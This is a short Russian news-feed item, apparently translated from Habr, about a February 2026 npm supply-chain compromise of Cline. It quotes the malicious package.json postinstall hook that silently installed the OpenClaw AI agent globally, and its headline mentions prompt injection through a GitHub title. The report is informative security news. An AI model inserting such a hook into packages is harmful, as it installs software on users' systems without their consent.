Habr[Перевод] Агент под прикрытием: Как один заголовок-промпт на GitHub помог взломать 4000 компьютеров
17 февраля 2026 года в репозитории npm была опубликована версия [email protected] . С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт. Лишь в файле package.json притаилась одна лишняя строчка: "postinstall": "npm install -g openclaw@latest" В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw. Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса. Пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.
https://habr.com/ru/companies/bothub/articles/1007638/
#github #cline #openclaw #аднан_хан #stepsecurity #clinejection
Агент под прикрытием: Как один заголовок-промпт на GitHub помог взломать 4000 компьютеров
17 февраля 2026 года в репозитории npm была опубликована версия [email protected] . С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт. Лишь в файле package.json притаилась...
KrebsOnSecurity RSS
ITSEC News